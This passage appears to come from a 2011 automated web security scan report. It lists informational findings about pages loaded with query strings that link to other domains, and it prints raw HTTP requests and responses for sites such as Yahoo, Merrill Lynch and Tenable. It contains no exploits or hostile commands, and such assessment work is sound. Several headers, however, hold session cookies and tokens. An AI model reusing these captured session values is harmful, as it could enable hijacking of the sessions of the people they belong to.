Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=08QxMuCE5xcRp6XxvP9UqQQVFjUnPTRIkxcDabYECLHYlgjWjedO.aMI9RGj2l09q.GrzSj0ZGNpKWL4tC5RhhHyRxFHPlU.kFCMEd44rNZiy50Es8NrBu7yXU0mNtf0YtrWeEjpo31kxbqrG0YGBvIbxraTXVC9nbjUpNtv9aXJppMZot2l11h5_ZSFAPhtqxX_6SVAEVGb0NKTjuEX9ZYv2zDAxiWP9cGTqFS0cy9sv336lSqBJx7SukerpgGajbVm5ixswV527gxjaF3uyCr7m1vg_4ERgH_kHGmM1GC3lZg7kpdA4se.Qgpe8f7RJkYS8crdx364dtmP6Js16W8_gxE1rMXJs1u9F8J4fm3eQRNc_54_vpkaiaTqfiqOcFZODhj_ghb_GOxG1FWZmW.i2zsaspuKA4yive5ZswfNSY0PlT8WhNaRhUIxTsKui8a4VYdjdz.5HLTMtIko4yhA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:55:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 42663


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="https://s.yimg.com/lq/i/reg/css/yregbase_sec_ui_1_9.css">
<style type="text/css">
...[SNIP]...
<!-- intl = us, spaceid = 150002530 offset = 0 position = HEAD -->
<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css"><style type="text/css">
...[SNIP]...
02530:HEAD/Y=YAHOO/EXP=1303833323/L=c7cB8EWTcKCKRmeZTatPkQEZrcHW8022zssABCT7/B=1qb0gGKImk0-/J=1303826123340679/K=AZxs5n4opLnqgMbq39x9iA/A=5775037/R=0/SIG=10mgpruen/*http://www.yahoo.com" target="_top"><img id="ygmalogoimg" width="142" height="26" src="https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif" alt="Yahoo!"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ub4nfd(gid$c7cB8EWTcKCKRmeZTatPkQEZrcHW8022zssABCT7,st$1303826123281279,v$1.0))&t=J-D"></noscript>
...[SNIP]...

20.32. http://nuclearpesticide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nuclearpesticide.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?epl=6uDg8f0GtTBB04c13Nw5Y2TAIUmQUDhFchd_0fciLHGkFRPIpi8gG4Jpix0wCcvzJ5qDEQahgZLFrI5CphQZUysHDq10em_RGphrcn6kQE3JISFcR16KixcH4xgxowJDrvsks3GX6v1OBwDUozbUpqZpU08RlOkB1IZMbTLURhF1ACAQ3ue_AADgfwUAAECA2wgAAGTAIUlZUyZZQTE2aFpChgAAAPA HTTP/1.1
Host: nuclearpesticide.com
Proxy-Connection: keep-alive
Referer: http://nuclearpesticide.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: nuclearpesticide.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825549%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Wed, 27-Apr-2011 13:45:49 GMT
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825549%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Ayszswytswwytqwwv; path=/; expires=Wed, 27-Apr-2011 13:45:49 GMT
Set-Cookie: Spusr=a0015ac53514db6cc8d1a44; path=/; expires=Thu, 25-Apr-2013 13:45:49 GMT
Connection: Keep-Alive
Content-Length: 52421

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- turing_cluster_prod -->
<html>
<head> <title> nuclearpesticide.com </title>
<meta http-equiv="Keywords
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<link rel="shortcut icon" href="http://cdn.dsultra.com/favicon/mi_favicon.ico" type="image/x-icon">
<script type="text/javascript">
...[SNIP]...
</script>


<link rel="stylesheet" href="http://cdn.dsultra.com/css/0/landing/en.css" type="text/css">


<link rel="stylesheet" href="http://cdn.dsultra.com/css/782/landing/en.css" type="text/css">

<!-- BOF custom css -->
...[SNIP]...
<span class="footer_privacy_section">
<a href="http://cdn.dsultra.com/t/privacy_ds.htm" target="privacy_nuclearpesticide_com">Privacy Policy</a>
...[SNIP]...
</style>
<SCRIPT TYPE="text/javascript" SRC="http://adserving.cpxadroit.com/tags2/4-1005620.js"></SCRIPT>
...[SNIP]...
</script>

<iframe src='http://domdex.com/f?c=107&k=health insurance coverage' width=0 height=0 frameborder=0></iframe>
...[SNIP]...
</script> <script type="text/javascript" src="http://p.chango.com/p.js"></script>
...[SNIP]...

20.33. https://olui2.fs.ml.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olui2.fs.ml.com
Path:   /login/login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b HTTP/1.1
Host: olui2.fs.ml.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 65680608
Set-Cookie: Bear=lOEt4KgcVyTNtOFnrwpDlr8rCGj6G8KxVhb/yhftyUA=; domain=.fs.ml.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89522


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...
</span><link id="ctl00_ctl00_glbalLayoutCSS" href="https://styles-olui.akamai-cdn.com/sve/p/mymerrill/12/default/styles/global_layout.css" rel="stylesheet" type="text/css" runat="server" /><link id="ctl00_ctl00_printCSS" href="https://styles-olui.akamai-cdn.com/sve/p/mymerrill/12/default/styles/print.css" rel="stylesheet" type="text/css" media="print" runat="server" /><title>
...[SNIP]...
</script>

<script src="https://scripts-olui.akamai-cdn.com/sve/js/ms/Microsoft_min_1.0.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://scripts-olui.akamai-cdn.com/sve/js/GL/Global.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/GL/PlatformInstrumentation.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/JQ/jquery-1.3.2.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/gl/pixy_chat.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/CLUIResources/scripts/UIControls.CLUICommon.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/GL/Comp_Art_2009.3.1701.35.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/ClientScript/ValidateUser-3.4.6202.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/GL/Platform_min.js" type="text/javascript"></script>
...[SNIP]...

20.34. http://response.firstdata.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://response.firstdata.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?elqPURLPage=15 HTTP/1.1
Host: response.firstdata.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:44:07 GMT
Content-Length: 25889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>The F
...[SNIP]...
</nometa>
<SCRIPT src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></SCRIPT>
<SCRIPT src=http://img.en25.com/Web/FirstDataCorporation/jquery.validate.min.js></SCRIPT>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" media="screen" href="http://img.en25.com/Web/FirstDataCorporation/transarmor_6841.css" />
<!--[if IE 6]>
...[SNIP]...
<a href="http://www.firstdata.com" target="_blank"><img src="http://now.eloqua.com/eloquaimages/clients/FirstDataCorporation/%7B4f7a74c0-3cee-4ff6-b61b-c59da48c6238%7D_fd-logo2.png" alt="First Data logo" width="217" height="59"></a>
...[SNIP]...
<h1><img class="pngfix_" src="http://now.eloqua.com/eloquaimages/clients/FirstDataCorporation/%7Be6a2d2dd-f4b9-45c5-b04a-a31d4e75b036%7D_first-data-transarmor.png" alt="" width="161" height="10">&nbsp;</h1>
...[SNIP]...
<a href="http://www.firstdata.com/demos/transarmor/podcasts/Rob_M_TransArmor_reduces_costs_of_PCI_compliance.html" target="_blank"><img class="pngfix_" src="http://now.eloqua.com/eloquaimages/clients/FirstDataCorporation/%7Bf07f8b32-6a2f-4e9c-8d00-872ce065cd2c%7D_video-preview.jpg" alt="Podcast: How TransArmor Reduces Cost for PCI Compliance" width="286" height="166"></a>
...[SNIP]...
<div id="how-it-works"><img class="pngfix_" src="http://now.eloqua.com/eloquaimages/clients/FirstDataCorporation/%7B1a85b4a3-297d-46e1-a35b-5a28c9bff5c4%7D_how-transarmor-works.png" alt="How TransArmor Works" width="544" height="394"></div>
...[SNIP]...
</SCRIPT>
<SCRIPT src=http://img.en25.com/Web/FirstDataCorporation/plugins.js></SCRIPT>
<SCRIPT src=http://img.en25.com/Web/FirstDataCorporation/jquery.uniform.min.js></SCRIPT>
...[SNIP]...
</SCRIPT>
<SCRIPT src=http://img.en25.com/Web/FirstDataCorporation/transarmor_4809.js></SCRIPT>
<img src="http://www.bizographics.com/collect/?fmt=gif&url=response.firstdata.com&pid=1009" width="1" height="1" border="0" alt="">
<!-- SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com -->
...[SNIP]...

20.35. http://shots.snap.com/rk.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /rk.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /rk.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&lang=en-us&th=silver&src=www.slaviks-blog.com&cp=Shotsense&s=small&svc=&tag=&atext=posted&title=Musings%20on%20Database%20Security&dfs=10&call=0&uid=16266132404ce087181f51bbd2d1a9b9&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&fl=null&size=320x79 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:46 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:22:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780966; expires=Wed, 24-Apr-2013 01:22:46 GMT; path=/; domain=.snap.com
Set-Cookie: session=id%3Dcc29bbb979ecb0e0384fa2c504658e7f%26time%3D1303780966%26created_time%3D1303780966%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F; path=/; domain=.snap.com
Set-Cookie: session=id%3Dcc29bbb979ecb0e0384fa2c504658e7f%26time%3D1303780966%26created_time%3D1303780966%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1; path=/; domain=.snap.com
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:45 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 10269

<html>
<head>


<style>


body {
margin: 0;
padding: 0;
background: #f2f2f2 url('http://i.ixnp.com/images/hdr-spons.gif') no-repeat fixed 97% 94%;

border: 0;
}

#keywordTable {
fon
...[SNIP]...
</li>


<img src="http://direct.i.ixnp.com/images/ss_conf/89fdd0457a773fb9e78a2ee3e0b8ebd3/10.10.55:7780" width="1" height="1">


</ul>
...[SNIP]...

20.36. https://store.tenable.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?main_page=index&cPath=5 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:49:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22426

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Perimeter Service : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
<li><a href="https://discussions.nessus.org/"><span>
...[SNIP]...
<div id="digicertsitesealcode" style="width: 81px; height: 76px; margin: 5px auto 0px auto;" align="center"><script language="javascript" type="text/javascript" src="https://www.digicert.com/custsupport/sealtable.php?order_id=00185925&amp;seal_type=a&amp;seal_size=large&amp;seal_color=blue&amp;new=1"></script>
...[SNIP]...
<li><a href="https://discussions.nessus.org/"><span>
...[SNIP]...
<li style="" class="navFooter2"><a href="https://discussions.nessus.org/"><span>
...[SNIP]...

20.37. https://store.tenable.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:39 GMT
Server: Apache
Set-Cookie: zenid=7fb8442f26d1db353ad8306c5db292f6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28503

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta
...[SNIP]...
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
<li><a href="https://discussions.nessus.org/"><span>
...[SNIP]...
<div id="digicertsitesealcode" style="width: 81px; height: 76px; margin: 5px auto 0px auto;" align="center"><script language="javascript" type="text/javascript" src="https://www.digicert.com/custsupport/sealtable.php?order_id=00185925&amp;seal_type=a&amp;seal_size=large&amp;seal_color=blue&amp;new=1"></script>
...[SNIP]...
<li><a href="https://discussions.nessus.org/"><span>
...[SNIP]...
<li style="" class="navFooter2"><a href="https://discussions.nessus.org/"><span>
...[SNIP]...

20.38. http://threats2.paretologic.revenuewire.net/pcha/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://threats2.paretologic.revenuewire.net
Path:   /pcha/download

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pcha/download?3562113 HTTP/1.1
Host: threats2.paretologic.revenuewire.net
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 14:00:40 GMT
Server: Apache
Location: http://threats2.paretologic.safecart.com/pcha/download?3562113
Content-Length: 383
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://threats2.paretologic.safecart.com/pcha/download?3562113">here</a>
...[SNIP]...

20.39. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.1.10.1303778640; site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:43:37 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:44:37 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
</title>


<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...
</div>
                   <script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf"></script> <noscript> <iframe src="http://www.google.com/recaptcha/api/noscript?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf" height="300" width="500" frameborder="0"></iframe>
...[SNIP]...
<td width="100%"><iframe name="check_frame" width="318" height="199" src="http://www.spruzme.com/files/apps/geolocator/frame.asp" style="display:none;">
Your browser does not support inline frames or is currently configured not to display inline frames.
</iframe>
...[SNIP]...

20.40. http://www.backbonesecurity.com/interior.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backbonesecurity.com
Path:   /interior.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /interior.cfm?itemCategory=39808&siteid=418&priorId=0 HTTP/1.1
Host: www.backbonesecurity.com
Proxy-Connection: keep-alive
Referer: http://www.onestoppciscan.com/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 23:43:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=40337214;path=/
Set-Cookie: CFTOKEN=65706353;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type="text/javascript" src="http://beta.asoundstrategy.com/components/embeddedcontent.js" defer="defer"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://remoting.asoundstrategy.com/components/menu_files/menu.js"></script>
<script type="text/javascript" src="http://remoting.asoundstrategy.com/components/swfobject_source.js"></script>
<script type="text/javascript" src="http://remoting.asoundstrategy.com/assiwebsites/site284/images/template251/motionpack.js"></script>
...[SNIP]...
<link type="text/css" href="style.css" rel="stylesheet"/>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<div class="slideImage" style="z-index:99;">

<img src="http://beta.asoundstrategy.com/sitemaster/userUploads/site418/bizIT.jpg" border="0"/>

</div>
...[SNIP]...
<div class="slideImage" style="z-index:99;">

<img src="http://beta.asoundstrategy.com/sitemaster/userUploads/site418/pciscan.jpg" border="0"/>

</div>
...[SNIP]...
<div class="slideImage" style="z-index:99;">

<img src="http://beta.asoundstrategy.com/sitemaster/userUploads/site418/SARC.jpg" border="0"/>

</div>
...[SNIP]...
<div class="slideImage" style="z-index:99;">

<img src="http://beta.asoundstrategy.com/sitemaster/userUploads/site418/security.jpg" border="0"/>

</div>
...[SNIP]...
<div style="position:absolute; top:100px; left:0px;"><a href="http://www.asoundstrategy.com" class="footerLinks" target="_blank" style="font-size:11px;">Site
Powered by siteMaster CMS &reg;</a>
...[SNIP]...

20.41. https://www.bankofamerica.com/credit-cards/cardoverview.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /credit-cards/cardoverview.action?context_id=overview_page HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
